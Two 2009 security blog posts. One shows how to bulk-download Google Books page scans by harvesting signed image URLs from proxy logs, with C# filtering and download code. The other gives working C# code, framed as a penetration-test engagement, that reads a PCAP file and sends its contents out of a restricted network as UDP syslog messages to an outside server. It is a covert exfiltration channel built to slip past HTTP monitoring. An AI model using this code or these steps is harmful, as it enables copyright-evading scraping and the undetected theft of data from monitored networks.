Tuesday, June 2, 2009
Google Books Spidering
I don't usually read books on Google Books. The scans are not of the best quality, and the site does not let me conveniently print a page or two for offline reading; that is apparently discouraged by Google. It's supposed to be a "demo" site to encourage actually buying the book, and I am fine with that.
This post is not meant to discuss the merits of "crippled" demos. I actually wanted to talk a little about the content protection Google chose to employ.
In my mind, if you are trying to prevent content sifting or crawling (and they obviously do, since there is a copyright notice on every page), you should evaluate more methods of protection than obfuscating the JavaScript code that fetches images of scanned pages into the browser. You should not rely on AJAX calls alone to eliminate first-generation (href-following) spidering. You should not allow incomplete URL parameter randomization, and you SHOULD tie requests to an existing session.
So, on to the example.
Suppose I like the Ruby by Example book, I do not agree with Google's TOS, and I want to use the book's content for my own purposes.
Every page of the book scan I am interested in is fetched from Google with XHR and rendered in the browser. Breaking on the request and following it around lands me in a JSON response of the following format:
Content-Type: application/javascript; charset=UTF-8
Server: OFE/0.1
Content-Length: 2496
{"page":[{"pid":"PR21","src":"http://books.google.com/books?id=kq2dBNdAl3IC\x26pg=PR21\x26img=1\x26zoom=3\x26hl=en\x26sig=ACfU3U2ydqAZXhIBKIH1XKTJhS4Ay2IXkg","highlights":[{"X":370,"Y":51,"W":26,"H":11},{"X":139,"Y":93,"W":19,"H":10},{"X":218,"Y":119,"W":19,"H":10},{"X":352,"Y":186,"W":26,"H":11},{"X":230,"Y":214,"W":25,"H":11},{"X":417,"Y":255,"W":26,"H":11},{"X":493,"Y":269,"W":23,"H":11},{"X":370,"Y":449,"W":25,"H":11},{"X":402,"Y":490,"W":26,"H":11},{"X":139,"Y":585,"W":22,"H":11},{"X":320,"Y":614,"W":23,"H":11},{"X":146,"Y":681,"W":21,"H":9},{"X":158,"Y":690,"W":20,"H":9},{"X":139,"Y":699,"W":20,"H":9}],"flags":0,"order":22,"uf":"http://books.google.com/books_feedback?id=kq2dBNdAl3IC\x26spid=ygOBAha9Lj5wEmJbb7L0E4AMedYBAAAAEwAAAAvsLgsil0rRCj9QbBB0CmBqRC_Lik05VtZnyTK-XBfQ\x26ftype=0","vq":"ruby by
..... (many more page entries follow)
This blob is processed by an obfuscated, long-named JS file, which puts the images into the DOM and renders them in the browser. Let's say that's irrelevant at the moment.
Look at the following snippet from the JSON response:
"src":"http://books.google.com/books?id=kq2dBNdAl3IC\x26pg=PR21\x26img=1\x26zoom=3\x26hl=en\x26sig=ACfU3U2ydqAZXhIBKIH1XKTJhS4Ay2IXkg"
OK, \x26 is really &. Otherwise, it's a valid URL for a 3x-zoomed image of page 21 of the book with id=kq2dBNdAl3IC.
There is also a dynamic signature of the page at the end: sig=ACfU3U2ydqAZXhIBKIH1XKTJhS4Ay2IXkg
Every page of this book has a different signature. However, look at the following two requests:
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA102&img=1&zoom=3&hl=en&sig=ACfU3U0j7KKM_nSZ5HTwPQxpka2gDwJFsQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA103&img=1&zoom=3&hl=en&sig=ACfU3U2itwtHSRsi3gGA_1uqDFYlX76BqA
There is a non-random element at the beginning of the signature payload (ACfU3U in both). I am not going to go into how we could try to brute-force or fuzz the signature here, or how to read the client-side JS file to figure out what that signature consists of. The point is that content navigation is not tied to session cookies or any other UI navigation data. A simple GET on the URL fetches the image of a page.
All you have to do now is set your favorite web proxy to log URLs for JPEGs conforming to ".*sig=ACfU3U.*" and iterate through the pages. You don't even need to capture the content yet.
Google does the job of fetching all the pages once you start mouse-scrolling in the book DIV. So you scroll through the whole book, then go to your proxy log and pick up records like the following, substituting \x26 -> & (a small filtering sketch follows the list):
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA102&img=1&zoom=3&hl=en&sig=ACfU3U0j7KKM_nSZ5HTwPQxpka2gDwJFsQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA103&img=1&zoom=3&hl=en&sig=ACfU3U2itwtHSRsi3gGA_1uqDFYlX76BqA
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA105&img=1&zoom=3&hl=en&sig=ACfU3U0SJesKmEQ2HUl2ntgNVBIrLK7UHQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA106&img=1&zoom=3&hl=en&sig=ACfU3U3i-gOkxdtYfeGLd7CFsRGZiPnT_Q
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA107&img=1&zoom=3&hl=en&sig=ACfU3U0FbGnYvyAY2T6uGV9rA-bY0J4cvw
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA10&img=1&zoom=3&hl=en&sig=ACfU3U3B0rfiUmevGsmVHgLEDN3sxANqkg
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA11&img=1&zoom=3&hl=en&sig=ACfU3U3uXbNxXALDKMG-OZ2bEGVlzN3JaA
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA13&img=1&zoom=3&hl=en&sig=ACfU3U0Bb32Lu4L9KzlCRS1gbURVfNcklA
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA14&img=1&zoom=3&hl=en&sig=ACfU3U1HVLZyKZBfm9y01Ly-Lp6AEo7B8Q
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA15&img=1&zoom=3&hl=en&sig=ACfU3U3aVGlHL9Sph_ttbm7tfSWVNyyFMQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA16&img=1&zoom=3&hl=en&sig=ACfU3U1CFrpu9LiQwuS1HIcsYu6qBrNppg
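Sifting a raw log by hand gets old quickly, so here is a minimal C# sketch of that filtering step (keeping to .NET, in the spirit of the post below). The log file name "proxy.log" and its one-entry-per-line layout are assumptions, and the sketch also takes care of the \x26 substitution:

using System;
using System.IO;
using System.Text.RegularExpressions;

class SigFilter
{
    static void Main()
    {
        // Match the signed page-image URLs described above
        Regex sigUrl = new Regex(
            "http://books\\.google\\.com/books\\?[^ \"]*sig=ACfU3U[^ \"]*");
        foreach (string line in File.ReadAllLines("proxy.log"))
        {
            // Handle \x26 escapes in case the log kept them verbatim
            Match m = sigUrl.Match(line.Replace("\\x26", "&"));
            if (m.Success)
                Console.WriteLine(m.Value);
        }
    }
}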
You now plug these into a script (curl will do, so will wget) to fetch the book's content.
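And if you are stuck on Windows without curl or wget, the fetch loop itself is equally short in .NET. Again a sketch, not the exact tool: it assumes the cleaned-up URLs sit one per line in a hypothetical urls.txt:

using System;
using System.IO;
using System.Net;

class PageFetcher
{
    static void Main()
    {
        WebClient web = new WebClient();
        int n = 0;
        foreach (string url in File.ReadAllLines("urls.txt"))
        {
            // Output naming is arbitrary; the page id is also in the URL (pg=...)
            string file = String.Format("page{0:D3}.jpg", ++n);
            web.DownloadFile(url, file);
            Console.WriteLine("{0} <- {1}", file, url);
        }
    }
}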
Now, I have not researched it enough, but I wonder if Watir or Selenium or other browser automation frameworks could do the scrolling for you and automate the process altogether.
I don't encourage anyone to actually copy Google's content - go buy the book if you like it, because the people who suffer most from copying are the authors.
However, the idea here is: how does Google plan to protect my data tomorrow if it cannot protect something it makes money on today?
Monday, June 1, 2009
Pcap2Syslog for .NET, or Stuck Transferring PCAP over UDP
I was recently in a situation where I wanted to transfer a fairly large .pcap file (1GB) out of an internal network as part of an engagement. I did have direct HTTP connectivity to the outside (proxied and monitored for illegal sites), so I tried HTTP uploads, but for some reason my transfers were getting dropped about 5 megs in. I had no control over the issue, and frankly I did not want to dig any deeper than I already had. I think I was in the "3rd" tier, with all the nice policies applied to users like me so we are not able to waste the company's time surfing the internet :) Anyway, all I had was outbound DNS for resolution, crippled HTTP, and syslog. Don't ask me why syslog was open to the internet; probably for monitoring or data collection purposes for a managed service provider, or something like that.
I started thinking of chopping my pcap into smaller chunks and doing the upload. I knew exactly what I would do on *nix, and had scripts made for a similar purpose, but I happened to be on Windows and did not readily know what tools I would use.
So DNS or Syslog?
I had not yet researched tools that would let me chop up binary data (such as a PCAP), package it into smaller chunks (Base64 or not), and shove it over a DNS tunnel. I am sure they exist, and most likely many smart folks out there can point me to the ones they prefer. To date, I have been fine bypassing content filtering with XML/RPC streams over HTTP(S). Not this time, though.
Syslog? Well, it is foreign to Windows to begin with... What are the chances of getting the right tools fast enough to parse a PCAP and transform it into syslog messages? I gather there would be enough dependencies to deter me (or to get my activities detected). Yeah, Cygwin comes to mind...
OK, start thinking outside the box. I have VS2008, so I have access to the .NET libraries. But what can parse PCAP, and which library can generate syslog messages? Well, syslog is a simple protocol, and message generation can be accomplished with plain sockets, something like this.
Indeed, all you need is
using System.Net;
using System.Net.Sockets;
using System.Text;
and in a nutshell:
1. Instantiate UDP transport
UdpClient udp = new UdpClient(ipAddress, 514);
2. Build the syslog string according to the RFC (the PRI part goes in angle brackets):
string[] strParams = { "<" + priority.ToString() + ">",
                       time.ToString("MMM dd HH:mm:ss "),
                       machine + " ",
                       body };
3. Send the chunk out.
byte[] rawMsg = Encoding.ASCII.GetBytes(string.Concat(strParams));
udp.Send(rawMsg, rawMsg.Length);
udp.Close();
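Putting the three steps together, a minimal self-contained sketch; the server name and the priority value (13 = user-level notice) are placeholders, not anything from a real engagement:

using System;
using System.Net.Sockets;
using System.Text;

class SyslogSender
{
    // One RFC 3164-style message: <PRI>TIMESTAMP HOSTNAME MSG
    // (strictly, the RFC wants the day space-padded, e.g. "Jun  1",
    // but most collectors are lenient)
    public static void Send(string server, int priority,
                            string machine, string body)
    {
        string msg = String.Format("<{0}>{1} {2} {3}",
            priority,
            DateTime.Now.ToString("MMM dd HH:mm:ss"),
            machine, body);
        byte[] rawMsg = Encoding.ASCII.GetBytes(msg);
        UdpClient udp = new UdpClient(server, 514);
        udp.Send(rawMsg, rawMsg.Length);
        udp.Close();
    }

    static void Main()
    {
        // "logs.example.com" is a placeholder syslog server
        Send("logs.example.com", 13, Environment.MachineName, "pcap2syslog test");
    }
}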
The answer to the first question came in the form of SharpPcap. It's a standalone assembly which lives in
Tamir.IPLib.SharpPcap.dll.
using System;
using System.Text;
using System.IO;
using Tamir.IPLib;
using Tamir.IPLib.Packets;
Since it can read pcaps offline, I can do the following:
//Get an offline file pcap device
var device = SharpPcap.GetPcapOfflineDevice(capFile);
//Open the capture file for reading
device.PcapOpen();
Then, of course, you can iterate through packets like so:
Packet packet;
while ((packet = device.PcapGetNextPacket()) != null)
{
    DateTime ptime = packet.PcapHeader.Date;
    int plen = packet.PcapHeader.PacketLength;
    // Print the time and length of each received packet (for debugging)
    string record = String.Format("{0}/{1}/{2} - {3}:{4}:{5} len={6}",
        ptime.Day, ptime.Month, ptime.Year,
        ptime.Hour, ptime.Minute, ptime.Second, plen);
    Console.WriteLine(record);
    StringBuilder sbuilder = new StringBuilder();
    // Append to the message builder, then either call the syslog
    // routines from above here, or call a Syslog class from here.
    sbuilder.Append(record);
}
If you want to send only selected data out of the PCAP, based on filters (say, a communication map to and from a host over UDP), then inside the while loop you can introduce more elaborate processing:
if (packet is UDPPacket)
{
    DateTime time = packet.Timeval.Date;
    int ulen = packet.PcapHeader.PacketLength;
    // renamed from "udp" to avoid clashing with the UdpClient above
    UDPPacket udpPacket = (UDPPacket)packet;
    string srcIp = udpPacket.SourceAddress;
    string dstIp = udpPacket.DestinationAddress;
    int srcPort = udpPacket.SourcePort;
    int dstPort = udpPacket.DestinationPort;
    string record = String.Format(" UDP {0}:{1} -> {2}:{3}",
        srcIp, srcPort, dstIp, dstPort);
    Console.WriteLine(record);
    // Append to the message builder here if you want, then either
    // call the syslog routines from above, or a Syslog class.
    sbuilder.Append(record);
}
} // this second brace closes the surrounding while loop
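For completeness, this is roughly how the pieces hang together, reusing only the SharpPcap calls shown above and the SyslogSender sketch from earlier. The capture file name and the syslog server are placeholders:

using System;
using Tamir.IPLib;
using Tamir.IPLib.Packets;

class Pcap2Syslog
{
    static void Main()
    {
        var device = SharpPcap.GetPcapOfflineDevice("capture.pcap");
        device.PcapOpen();

        Packet packet;
        while ((packet = device.PcapGetNextPacket()) != null)
        {
            if (!(packet is UDPPacket))
                continue;
            UDPPacket udpPacket = (UDPPacket)packet;

            // One short outbound syslog message per UDP packet seen
            SyslogSender.Send("logs.example.com", 13, Environment.MachineName,
                String.Format("UDP {0}:{1} -> {2}:{3}",
                    udpPacket.SourceAddress, udpPacket.SourcePort,
                    udpPacket.DestinationAddress, udpPacket.DestinationPort));
        }
    }
}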
It turned out better than I expected. I filtered what I needed for further analysis, and the "interesting" parts of my data went outbound in short syslog messages.
Next, I should really look at DNS covert channels. If anyone has suggestions on tools, please let me know.